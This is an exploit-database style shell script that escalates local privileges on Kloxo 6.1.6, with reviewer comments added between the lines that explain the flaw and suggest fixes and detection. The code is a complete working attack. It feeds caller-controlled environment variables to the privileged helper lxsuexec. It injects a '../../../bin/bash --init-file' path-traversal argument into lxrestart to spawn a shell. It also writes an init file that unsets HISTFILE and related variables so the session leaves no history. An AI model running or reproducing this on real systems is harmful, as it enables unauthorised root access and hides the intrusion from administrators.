<code>#!/bin/sh</code>
<code># Exploit Title: Kloxo Local Privilege Escalation</code>
<code># Google Dork: inurl:kiddies</code>
<code># Date: August 2012 or so</code>
<code># Exploit Author: HTP</code>
<code># Vendor Homepage: http://lxcenter.org/</code>
<code># Software Link: [download link if available]</code>
<code># Version: 6.1.6 (Latest)</code>
<code># Tested on: CentOS 5</code>
<code># CVE : None</code>
<code># This exploit requires you to be the Apache user, or another capable of running lxsuexec.</code>
# Resolve the numeric UID of the lxlabs account: field 3 (cut -d: -f3) of the
# /etc/passwd line(s) matching "lxlabs". The grep is unanchored, so every line
# containing that string contributes a value.
<code>LXLABS=`</code><code>cat</code>
/etc/</code><code>passwd</code> <code>|</code><code>grep</code> <code>lxlabs |</code><code>cut</code> <code>-d: -f3`</code>
# Environment exported for the lxsuexec call at the end of the script.
# NOTE(review): the script depends on lxsuexec honouring these caller-controlled
# variables; presumably MUID/GID select the identity it switches to and
# TARGET/CHECK_GID/NON_RESIDENT steer its checks -- confirm against the lxsuexec
# source. A privileged helper that takes identity decisions from the invoking
# user's environment is the flaw class to look for when auditing or patching.
<code>export</code> <code>MUID=$LXLABS</code>
<code>export</code> <code>GID=$LXLABS</code>
<code>export</code> <code>TARGET=/bin/sh</code>
<code>export</code> <code>CHECK_GID=0</code>
<code>export</code> <code>NON_RESIDENT=1</code>
# Append (>>) one line to /tmp/w00trc that unsets history-, prompt-hook- and
# timeout-related shell variables; the next line passes this file to bash as
# --init-file. The path is fixed, so the file name is a usable host indicator.
<code>echo</code> <code>"unset HISTFILE HISTSAVE PROMPT_COMMAND TMOUT"</code> <code>>> /tmp/w00trc</code>
# Overwrite (>) /tmp/lol with a single command line: /usr/sbin/lxrestart gets one
# quoted argument made of "../" components, a different binary with options, and
# a trailing "#".
# NOTE(review): that shape suggests lxrestart builds a path or command string
# from its argument without validating it -- verify in the lxrestart source. The
# corresponding fix is an allow-list of expected service names and no shell
# interpolation of the argument.
<code>echo</code> <code>"/usr/sbin/lxrestart '../../../bin/bash --init-file /tmp/w00trc #' "</code> <code>> /tmp/lol</code>
# Hand /tmp/lol to lxsuexec under the environment exported above. Per the header
# comment, this requires an account that can execute lxsuexec (e.g. the Apache
# user), so tightening execute permission on that binary narrows exposure.
# Detection: audit executions of lxsuexec whose script argument lives under
# /tmp, and lxrestart arguments containing "/" , whitespace or "#".
<code>lxsuexec /tmp/lol</code>